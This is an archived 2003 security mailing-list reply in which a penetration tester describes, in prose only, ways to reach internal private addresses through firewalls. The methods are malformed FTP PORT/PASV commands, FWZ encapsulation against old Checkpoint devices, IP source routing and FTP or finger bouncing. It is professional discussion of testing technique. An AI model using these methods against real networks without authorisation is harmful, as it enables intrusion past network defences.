Re: internal IP address revealed by e-mail

From: Chris McNab (chris.mcnab@trustmatta.com)
Date: Tue Apr 29 2003 - 15:00:00 EDT

• Next message: raymond: "WebService pentest tool"
• Previous message: Yonatan Bokovza: "RE: internal IP address revealed by e-mail"
• Maybe in reply to: Vel: "internal IP address revealed by e-mail"
• Next in thread: Philippe Biondi: "Re: Port Scanners / Sniffers Review"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Hey,

There aren't any situations I can think of where you can run firewalk
against non-routable private addresses from the Internet. Your best bets at
network level are the following:

1) Abuse a stateful inspection problems (see Lopatic, Song & McDonald's
Blackhat 2000 presentation about this):

  - using malformed FTP PORT or PASV commands against accessible FTP servers
to punch holes through the firewall to other addresses and hosts
  - using FWZ encapsulation against older Checkpoint devices

2) Use malformed IP source routing options in your packets to try and route
packets to internal addresses, although this requires some investigation &
testing.. a good tool is Todd MacDermid's lsrscan (www.synacklabs.net).

Standard application level stuff includes exploiting a known vulnerability
to gain internal network access. There are many different ways to do this,
depending on which vulnerable services or applications you find, my
favorites are:

  - FTP PORT bouncing
  - finger redirection & bouncing

If the addresses are private, it's always going to be a pain talking to them
across the Internet, even more so if firewalls and proxies are in place. I'm
putting together a lengthy paper about these kinds of advanced techniques,
and will let the list know in due course.

Regards,

Chris

Chris McNab
Technical Director

Matta Security Limited
18 Noel Street
London W1F 8GN

Tel: 0870 077 1100
Mob: 0788 626 0878

This e-mail was sent from Matta Security Limited. The information contained
in this message is confidential, may be privileged, and is intended for the
addressee(s) only. If you have received this message in error please notify
the originator immediately. The unauthorised use, disclosure, copying or
alteration of this message is strictly forbidden. Matta Security Limited
does not warrant that any attachments are free from viruses or other
defects. Matta Security Limited will not be liable for direct, special,
indirect or consequential damages arising from alteration of the contents of
this message by a third party or as a result of any virus being passed on.

---------------------------------------------------------------------------
Did you know that you have VNC running on your network?
Your hacker does.
Plug your security holes.
Download a free 15-day trial of VAM:
http://www.securityfocus.com/StillSecure-pen-test
----------------------------------------------------------------------------

• Next message: raymond: "WebService pentest tool"
• Previous message: Yonatan Bokovza: "RE: internal IP address revealed by e-mail"
• Maybe in reply to: Vel: "internal IP address revealed by e-mail"
• Next in thread: Philippe Biondi: "Re: Port Scanners / Sniffers Review"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:32 EDT